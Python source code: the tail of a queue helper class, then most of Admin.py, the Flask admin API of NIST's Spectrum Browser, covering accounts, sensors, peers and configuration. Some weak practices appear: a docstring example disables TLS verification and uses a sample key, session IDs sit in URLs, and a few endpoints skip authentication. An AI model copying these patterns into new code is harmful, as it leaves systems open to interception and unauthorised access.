self.last_check = None
self.retry_number = -1
def did_fail(self):
return self.status == self.ERROR
class ChilledQueue(_queue.Queue, object):
"""
A queue subclass that is a bit more chill about how often it notifies the not empty event
Note: we inherit from object because queue.Queue is an old-style class in Python 2. This can
be removed once we stop support for Python 2
"""
def __init__(self, maxsize=0, chill_until=100, max_chill_time=1.0):
self._chill_until = chill_until
self._max_chill_time = max_chill_time
self._last_unchill = time.time()
super(ChilledQueue, self).__init__(maxsize=maxsize)
def put(self, item, block=True, timeout=None, chill=True):
"""Put an item into the queue.
If optional args 'block' is true and 'timeout' is None (the default),
block if necessary until a free slot is available. If 'timeout' is
a non-negative number, it blocks at most 'timeout' seconds and raises
the Full exception if no free slot was available within that time.
Otherwise ('block' is false), put an item on the queue if a free slot
is immediately available, else raise the Full exception ('timeout'
is ignored in that case).
"""
with self.not_full:
if self.maxsize > 0:
if not block:
if self._qsize() >= self.maxsize:
raise _queue.Full
elif timeout is None:
while self._qsize() >= self.maxsize:
self.not_full.wait()
elif timeout < 0:
raise ValueError("'timeout' must be a non-negative number")
else:
endtime = time.time() + timeout
while self._qsize() >= self.maxsize:
remaining = endtime - time.time()
if remaining <= 0.0:
raise _queue.Full
self.not_full.wait(remaining)
self._put(item)
self.unfinished_tasks += 1
if (
not chill
or self._qsize() > self._chill_until
or (time.time() - self._last_unchill) > self._max_chill_time
):
self.not_empty.notify()
self._last_unchill = time.time()
|
Admin.py | #! /usr/local/bin/python2.7
# -*- coding: utf-8 -*-
#
# This software was developed by employees of the National Institute of
# Standards and Technology (NIST), and others.
# This software has been contributed to the public domain.
# Pursuant to title 15 Untied States Code Section 105, works of NIST
# employees are not subject to copyright protection in the United States
# and are considered to be in the public domain.
# As a result, a formal license is not needed to use this software.
#
# This software is provided "AS IS."
# NIST MAKES NO WARRANTY OF ANY KIND, EXPRESS, IMPLIED
# OR STATUTORY, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTY OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT
# AND DATA ACCURACY. NIST does not warrant or make any representations
# regarding the use of the software or the results thereof, including but
# not limited to the correctness, accuracy, reliability or usefulness of
# this software.
'''
Created on Jun 3, 2015
All the admin methods go in here.
@author: local
'''
import Bootstrap
sbHome = Bootstrap.getSpectrumBrowserHome()
import sys
sys.path.append(sbHome + "/services/common")
sys.path.append(sbHome + "/services/admin")
from flask import Flask, request, abort, make_response
from flask import jsonify
from TestCaseDecorator import testcase
import random
import json
import authentication
import urlparse
from geventwebsocket.handler import WebSocketHandler
from gevent import pywsgi
from flask_sockets import Sockets
import traceback
import util
import GarbageCollect
from GarbageCollect import RepeatingTimer
import SensorDb
from Sensor import Sensor
import Config
import Log
import AccountsManagement
import AccountsChangePassword
import GenerateZipFileForDownload
from Defines import STATUS
from Defines import ADMIN
from Defines import OK
import SessionLock
import argparse
import ResourceDataStreaming
import DataStreamSharedState
import CaptureDb
import RecomputeOccupancies
import logging
import pwd
import os
import DbCollections
from multiprocessing import Process
UNIT_TEST_DIR = "./unit-tests"
global launchedFromMain
if not Config.isConfigured():
print "Please configure system using admin interface"
# sessions = {}
secureSessions = {}
gwtSymbolMap = {}
launchedFromMain = False
app = Flask(__name__, static_url_path="")
app.static_folder = sbHome + "/flask/static"
app.template_folder = sbHome + "/flask/templates"
sockets = Sockets(app)
random.seed()
@sockets.route("/admin/sysmonitor", methods=["GET"])
def getResourceData(ws):
"""
Web-browser websocket connection handler.
"""
util.debugPrint("getResourceData")
try:
ResourceDataStreaming.getResourceData(ws)
except:
util.logStackTrace(sys.exc_info())
traceback.print_exc()
raise
@app.route("/admin", methods=["GET"])
def adminEntryPoint():
util.debugPrint("admin")
return app.send_static_file("admin.html")
@app.route("/admin/getUserAccounts/<sessionId>", methods=["POST"])
def getUserAccounts(sessionId):
"""
get user accounts.
URL Path:
sessionId: session ID of the admin login session.
"""
@testcase
def getUserAccountsWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("getUserAccounts")
userAccounts = AccountsManagement.getUserAccounts()
retval = {"userAccounts": userAccounts,
STATUS: "OK",
"statusMessage": ""}
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getUserAccountsWorker(sessionId)
@app.route("/admin/deleteAccount/<emailAddress>/<sessionId>", methods=["POST"])
def deleteAccount(emailAddress, sessionId):
"""
delete user account
URL Path:
- emailAddress: The email address of the account to delete.
- sessionId: session ID of the admin login session.
URL Args (required):
none
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
def deleteAccountWorker(emailAddress, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("deleteAccount")
return jsonify(AccountsManagement.deleteAccount(emailAddress))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return deleteAccountWorker(emailAddress, sessionId)
@app.route("/admin/unlockAccount/<emailAddress>/<sessionId>", methods=["POST"])
def unlockAccount(emailAddress, sessionId):
"""
unlock user account
URL Path:
- emailAddress: The email address of the account to delete.
- sessionId: session ID of the admin login session.
URL Args (required):
none
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
@testcase
def unlockAccountWorker(emailAddress, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("unlockAccount")
return jsonify(AccountsManagement.unlockAccount(emailAddress))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return unlockAccountWorker(emailAddress, sessionId)
@app.route("/admin/togglePrivilegeAccount/<emailAddress>/<sessionId>",
methods=["POST"])
def togglePrivilegeAccount(emailAddress, sessionId):
"""
delete user accounts
URL Path:
- emailAddress: The email address of the account to delete.
- sessionId: session ID of the admin login session.
URL Args (required):
none
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
@testcase
def togglePrivilegeAccountWorker(emailAddress, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("togglePrivilegeAccount")
return jsonify(AccountsManagement.togglePrivilegeAccount(
emailAddress))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return togglePrivilegeAccountWorker(emailAddress, sessionId)
@app.route("/admin/resetAccountExpiration/<emailAddress>/<sessionId>",
methods=["POST"])
def resetAccountExpiration(emailAddress, sessionId):
"""
delete user accounts
URL Path:
- emailAddress: The email address of the account to delete.
- sessionId: session ID of the admin login session.
URL Args:
none
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
@testcase
def resetAccountExpirationWorker(emailAddress, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("resetAccountExpiration")
return jsonify(AccountsManagement.resetAccountExpiration(
emailAddress))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return resetAccountExpirationWorker(emailAddress, sessionId)
@app.route("/admin/createAccount/<sessionId>", methods=["POST"])
def createAccount(sessionId):
"""
create user account
URL Path:
sessionId: login session ID
Body (required):
- JSON string of account info
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
@testcase
def createAccountWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("createAccount")
requestStr = request.data
accountData = json.loads(requestStr)
return jsonify(AccountsManagement.createAccount(accountData))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return createAccountWorker(sessionId)
@app.route("/admin/resetPassword", methods=['POST'])
def resetPassword():
@testcase
def resetPasswordWorker():
try:
requestStr = request.data
accountData = json.loads(requestStr)
return authentication.resetPassword(accountData)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return resetPasswordWorker()
@app.route("/admin/authenticate", methods=['POST'])
def authenticate():
"""
Authenticate the user given his username and password from the requested
browser page or return an error if the user cannot be authenticated.
URL Path:
URL Args:
None
Body:
- JSON data
"""
@testcase
def authenticateWorker():
try:
util.debugPrint("authenticate")
p = urlparse.urlparse(request.url)
urlpath = p.path
if not Config.isConfigured() and urlpath[0] == "spectrumbrowser":
msg = "attempt to access spectrumbrowser before configuration"
msg += " -- please configure"
util.debugPrint(msg)
abort(500)
requestStr = request.data
accountData = json.loads(requestStr)
return jsonify(authentication.authenticateUser(accountData))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return authenticateWorker()
@app.route("/admin/verifySessionToken/<sessionId>", methods=['POST'])
def verifySessionToken(sessionId):
"""
Check the session token. Return TRUE if session Token is good and false
otherwise.
URL Path:
- sessionId: the session ID to check.
HTTP Return code:
- 200 OK
returns a document {status:OK} or {status: NOK} depending upon
whether the session token verified or not.
"""
try:
if authentication.checkSessionId(sessionId, ADMIN):
return jsonify({"status": "OK"})
else:
return jsonify({"status": "NOK"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/logOut/<sessionId>", methods=['POST'])
# @testcase
def logOut(sessionId):
"""
Log out of an existing session.
URL Path:
sessionId: The session ID to log out.
"""
@testcase
def logOutWorker(sessionId):
try:
authentication.logOut(sessionId)
return jsonify({"status": "OK"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return logOutWorker(sessionId)
@app.route("/admin/getSystemConfig/<sessionId>", methods=["POST"])
def getSystemConfig(sessionId):
"""
get system configuration.
URL Path:
sessionId: Session ID of the login session.
"""
@testcase
def getSystemConfigWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
systemConfig = Config.getSystemConfig()
if systemConfig is None:
config = Config.getDefaultConfig()
return jsonify(config)
else:
return jsonify(systemConfig)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getSystemConfigWorker(sessionId)
@app.route("/admin/getESAgents/<sessionId>", methods=["POST"])
def getESAgents(sessionId):
"""
get Sensor Control agents (typically the ESC) .
URL Path:
sessionId: session ID of the login session.
"""
@testcase
def getESAgentsWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
agents = Config.getESAgents()
retval = {"esAgents": agents}
retval[STATUS] = 'OK'
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getESAgentsWorker(sessionId)
@app.route("/admin/armSensor/<sensorId>/<sessionId>", methods=["POST"])
def testArmSensor(sensorId, sessionId):
"""
URL Path:
sessionId -- the session ID of the login session.
sensorId -- the sensorId
URL Args: None
Request Body:
- agentName: Name of the agent to arm/disarm sensor.
- key : Key (password) of the agent to arm/disarm the sensor.
HTTP Return Codes:
- 200 OK: invocation was successful.
- 403 Forbidden: authentication failure
- 400 Bad request: Sensor is not a streaming sensor.
Example Invocation:
::
params = {}
params["agentName"] = "NIST_ESC"
params["key"] = "ESC_PASS"
url = "https://{host}:8443/admin/armSensor/{self.sensorId}"
r = requests.post(url, data=json.dumps(params), verify=False)
"""
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
sensorConfig = SensorDb.getSensorObj(sensorId)
if sensorConfig is None:
abort(404)
if not sensorConfig.isStreamingEnabled():
abort(400)
persistent = request.args.get("persistent")
if persistent is None:
persistent = "false"
DataStreamSharedState.sendCommandToSensor(sensorId, json.dumps(
{"sensorId": sensorId,
"command": "arm",
"persistent": persistent}))
return jsonify({STATUS: OK})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/addESAgent/<sessionId>", methods=["POST"])
def addESAgent(sessionId):
invalid_chars = {'&', '$', '+', '/', ':', ';', '=', '?', '@', '#'}
@testcase
def addESAgentWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
requestStr = request.data
agentConfig = json.loads(requestStr)
agentName = agentConfig["agentName"]
bad_chars = invalid_chars.intersection(agentName)
if bad_chars:
msg = "Invalid character in agentName: {}"
util.debugPrint(msg.format(bad_chars))
abort(400)
key = agentConfig["key"]
bad_chars = invalid_chars.intersection(key)
if bad_chars:
msg = "Invalid character in key: {}"
util.debugPrint(msg.format(bad_chars))
abort(400)
Config.addESAgent(agentName, key)
agents = Config.getESAgents()
retval = {"esAgents": agents}
retval[STATUS] = 'OK'
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return addESAgentWorker(sessionId)
@app.route("/admin/deleteESAgent/<agentName>/<sessionId>", methods=["POST"])
def deleteESAgent(agentName, sessionId):
"""
remove ES Agent.
URL Path:
agentName: Agent name to remove.
sessionId: session ID of the login session.
"""
@testcase
def deleteESAgentWorker(agentName, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
Config.removeESAgent(agentName)
agents = Config.getESAgents()
retval = {"esAgents": agents}
retval[STATUS] = 'OK'
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return deleteESAgentWorker(agentName, sessionId)
@app.route("/admin/getPeers/<sessionId>", methods=["POST"])
def getPeers(sessionId):
"""
get outbound peers.
URL Path:
sessionId: session ID of the login session.
"""
@testcase
def getPeersWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
peers = Config.getPeers()
retval = {"peers": peers}
retval[STATUS] = 'OK'
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getPeersWorker(sessionId)
@app.route("/admin/removePeer/<host>/<port>/<sessionId>", methods=["POST"])
def removePeer(host, port, sessionId):
"""
remove outbound peer.
URL Path:
host: Host of peer to remove
port: port or peer to remove
sessionId: login session ID
"""
@testcase
def removePeerWorker(host, port, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
Config.removePeer(host, int(port))
peers = Config.getPeers()
retval = {"peers": peers}
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return removePeerWorker(host, port, sessionId)
@app.route("/admin/addPeer/<host>/<port>/<protocol>/<sessionId>",
methods=["POST"])
def addPeer(host, port, protocol, sessionId):
"""
add an outbound peer
URL Path:
host: Host of peer to add.
port: port of peer
protocol: http or https
sessionId: login session id.
"""
@testcase
def addPeerWorker(host, port, protocol, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
# TODO -- parameter checking.
Config.addPeer(protocol, host, int(port))
peers = Config.getPeers()
retval = {"peers": peers}
retval[STATUS] = OK
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return addPeerWorker(host, port, protocol, sessionId)
@app.route("/admin/getInboundPeers/<sessionId>", methods=["POST"])
def getInboundPeers(sessionId):
"""
get a list of inbound peers.
URL path:
- sessionID = session ID of the login
URL Args:
None
Returns:
- JSON string containing the inbound Peers accepted by this server.
HTTP Return Codes:
- 403 if authentication failed.
- 200 successful return.
"""
@testcase
def getInboundPeersWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
peerKeys = Config.getInboundPeers()
retval = {"inboundPeers": peerKeys}
retval[STATUS] = OK
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getInboundPeersWorker(sessionId)
@app.route("/admin/deleteInboundPeer/<peerId>/<sessionId>", methods=["POST"])
def deleteInboundPeer(peerId, sessionId):
"""
Delete an inbound peer record.
URL Path:
- peerId: Peer ID of peer to delete.
- sessionId: session ID of authenticated session.
Returns:
- JSON formatted list of peers.
HTTP Return Codes:
- 403 if authentication not successful.
"""
@testcase
def deleteInboundPeerWorker(peerId, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
Config.deleteInboundPeer(peerId)
peerKeys = Config.getInboundPeers()
retval = {"inboundPeers": peerKeys}
retval[STATUS] = OK
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return deleteInboundPeerWorker(peerId, sessionId)
@app.route("/admin/addInboundPeer/<sessionId>", methods=["POST"])
def addInboundPeer(sessionId):
"""
Add an inbound peer.
"""
@testcase
def addInboundPeerWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
requestStr = request.data
peerConfig = json.loads(requestStr)
util.debugPrint("peerConfig " + json.dumps(peerConfig, indent=4))
Config.addInboundPeer(peerConfig)
peers = Config.getInboundPeers()
retval = {"inboundPeers": peers}
retval[STATUS] = "OK"
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return addInboundPeerWorker(sessionId)
@app.route("/admin/setSystemConfig/<sessionId>", methods=["POST"])
def setSystemConfig(sessionId):
"""
set system configuration
URL Path:
sessionId the session Id of the login in session.
URL Args: None
Request Body:
A JSON formatted string containing the system configuration.
"""
@testcase
def setSystemConfigWorker(sessionId):
try:
util.debugPrint("setSystemConfig: " + sessionId)
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("passed authentication")
requestStr = request.data
systemConfig = json.loads(requestStr)
(statusCode, message) = Config.verifySystemConfig(systemConfig)
if not statusCode:
util.debugPrint("did not verify sys config")
return jsonify({"status": "NOK", "ErrorMessage": message})
util.debugPrint("setSystemConfig " + json.dumps(systemConfig,
indent=4, ))
if Config.setSystemConfig(systemConfig):
return jsonify({"status": "OK"})
else:
return jsonify({"status": "NOK", "ErrorMessage": "Unknown"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return setSystemConfigWorker(sessionId)
@app.route("/admin/addSensor/<sessionId>", methods=["POST"])
def addSensor(sessionId):
"""
Add a sensor to the system or return error if the sensor does not exist.
URL Path:
sessionId the session Id of the login in session.
URL Args: None
Request Body:
A JSON formatted string containing the sensor configuration.
"""
@testcase
def addSensorWorker(sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
requestStr = request.data
sensorConfig = json.loads(requestStr)
return jsonify(SensorDb.addSensor(sensorConfig))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return addSensorWorker(sessionId)
@app.route("/admin/toggleSensorStatus/<sensorId>/<sessionId>",
methods=["POST"])
def toggleSensorStatus(sensorId, sessionId):
@testcase
def toggleSensorStatusWorker(sensorId, sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
return jsonify(SensorDb.toggleSensorStatus(sensorId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return toggleSensorStatusWorker(sensorId, sessionId)
@app.route("/admin/purgeSensor/<sensorId>/<sessionId>", methods=["POST"])
def purgeSensor(sensorId, sessionId):
@testcase
def purgeSensorWorker(sensorId, sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
return jsonify(SensorDb.markSensorForPurge(sensorId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return purgeSensorWorker(sensorId, sessionId)
@app.route("/admin/deleteSensor/<sensorId>/<sessionId>", methods=["POST"])
def deleteSensor(sensorId, sessionId):
@testcase
def deleteSensorWorker(sensorId, sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
return jsonify(SensorDb.deleteSensor(sensorId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return deleteSensorWorker(sensorId, sessionId)
@app.route("/admin/updateSensor/<sessionId>", methods=["POST"])
def updateSensor(sessionId):
@testcase
def updateSensorWorker(sessionId):
try:
util.debugPrint("updateSensor")
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
requestStr = request.data
sensorConfig = json.loads(requestStr)
return jsonify(SensorDb.updateSensor(sensorConfig))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return updateSensorWorker(sessionId)
@app.route("/admin/getFrequencyBands/<sessionId>", methods=["POST"])
def getFrequencyBands(sessionId):
@testcase
def getFreqBandsWorker(sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
return jsonify(SensorDb.getFreqBands())
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getFreqBandsWorker(sessionId)
@app.route("/admin/getSystemMessages/<sensorId>/<sessionId>", methods=["POST"])
def getSystemMessages(sensorId, sessionId):
@testcase
def getSystemMessagesWorker(sensorId, sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
genzip = GenerateZipFileForDownload
zipfile = genzip.generateSysMessagesZipFileForDownload(sensorId,
sessionId)
return jsonify(zipfile)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getSystemMessagesWorker(sensorId, sessionId)
@app.route("/admin/getSensorInfo/<sessionId>", methods=["POST"])
def getSensorInfo(sessionId):
'''
Get the sensor configuration information of all sensors from the
sensor database. Note that sensitive information such as sensor
key is not returned.
URL Path:
sessionId the session Id of the login in session.
URL Args:
- getFirstLastMessages: return the first and last message metadata
Request Body:
A JSON formatted string containing the sensor information.
HTTP Return codes:
200 OK if the invocation successful.
'''
@testcase
def getSensorInfoWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
lastMessageFlagStr = request.args.get("getFirstLastMessages")
if lastMessageFlagStr is not None and lastMessageFlagStr == "true":
lastMessageFlag = True
else:
lastMessageFlag = False
response = SensorDb.getSensors(getMessageDates=lastMessageFlag)
return jsonify(response)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getSensorInfoWorker(sessionId)
@app.route("/admin/recomputeOccupancies/<sensorId>/<sessionId>",
methods=["POST"])
def recomputeOccupancies(sensorId, sessionId):
@testcase
def recomputeOccupanciesWorker(sensorId, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
return jsonify(RecomputeOccupancies.recomputeOccupancies(sensorId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return recomputeOccupanciesWorker(sensorId, sessionId)
@app.route("/admin/resetNoiseFloor/<sensorId>/<noiseFloor>/<sessionId>",
methods=["POST"])
def resetNoiseFloor(sensorId, noiseFloor, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
return jsonify(RecomputeOccupancies.resetNoiseFloor(sensorId,
noiseFloor))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/garbageCollect/<sensorId>/<sessionId>", methods=["POST"])
def garbageCollect(sensorId, sessionId):
@testcase
def garbageCollectWorker(sensorId, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
return jsonify(GarbageCollect.runGarbageCollector(sensorId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return garbageCollectWorker(sensorId, sessionId)
@app.route("/admin/deleteCaptureEvents/<sensorId>/<startDate>/<sessionId>",
methods=["POST"])
def deleteCaptureEvents(sensorId, startDate, sessionId):
"""
Delete the events from the capture db.
Send a message to the sensor to do the same.
"""
try:
if not authentication.checkSessionId(sessionId, ADMIN):
util.debugPrint("deleteCaptureEvents: failed authentication")
abort(403)
sdate = int(startDate)
if sdate < 0:
util.debugPrint("deleteCaptureEvents: illegal param")
abort(400)
else:
CaptureDb.deleteCaptureDb(sensorId, sdate)
command = json.dumps({"sensorId": sensorId,
"timestamp": sdate,
"command": "garbage_collect"})
DataStreamSharedState.sendCommandToSensor(sensorId, command)
return jsonify({STATUS: "OK"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/deleteAllCaptureEvents/<sensorId>/<sessionId>",
methods=["POST"])
def deleteAllCaptureEvents(sensorId, sessionId):
"""
Delete all the the capture events from the capture db.
Send a message to the sensor to do the same.
"""
try:
if not authentication.checkSessionId(sessionId, ADMIN):
util.debugPrint("deleteCaptureEvents: failed authentication")
abort(403)
else:
CaptureDb.deleteCaptureDb(sensorId)
return jsonify({STATUS: "OK"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/getSessions/<sessionId>", methods=["POST"])
def getSessions(sessionId):
@testcase
def getSessionsWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId,
ADMIN,
updateSessionTimer=False):
return make_response("Session not found", 403)
return jsonify(SessionLock.getSessions())
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getSessionsWorker(sessionId)
@app.route("/admin/freezeRequest/<sessionId>", methods=["POST"])
def freezeRequest(sessionId):
@testcase
def freezeRequestWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
return jsonify(SessionLock.freezeRequest(sessionId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return freezeRequestWorker(sessionId)
@app.route("/admin/unfreezeRequest/<sessionId>", methods=["POST"])
def unfreezeRequest(sessionId):
@testcase
def unfreezeRequestWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found", 403)
return jsonify(SessionLock.freezeRelease(sessionId))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return unfreezeRequestWorker(sessionId)
@app.route("/admin/log/<sessionId>", methods=["POST"])
def log(sessionId):
return Log.log()
@app.route("/admin/getScreenConfig/<sessionId>", methods=["POST"])
def getScreenConfig(sessionId):
"""
get screen configuration.
URL Path:
sessionId -- the session ID for the login session.
Returns:
200 OK on successful completion. A JSON Document
"""
@testcase
def getScreenConfigWorker(sessionId):
try:
screenConfig = Config.getScreenConfig()
if screenConfig is None:
config = Config.getDefaultScreenConfig()
return jsonify(config)
else:
return jsonify(screenConfig)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getScreenConfigWorker(sessionId)
@app.route("/admin/setScreenConfig/<sessionId>", methods=["POST"])
def setScreenConfig(sessionId):
"""
set system configuration
URL Path:
sessionId the session Id of the login in session.
URL Args: None
Request Body:
A JSON formatted string containing the system configuration.
HTTP Return codes:
200 OK if the invocation successful.
{status:OK} returned JSON document.
"""
@testcase
def setScreenConfigWorker(sessionId):
try:
util.debugPrint("setScreenConfig: " + sessionId)
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
requestStr = request.data
screenConfig = json.loads(requestStr)
if Config.setScreenConfig(screenConfig):
return jsonify({"status": "OK"})
else:
return jsonify({"status": "NOK", "ErrorMessage": "Unknown"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
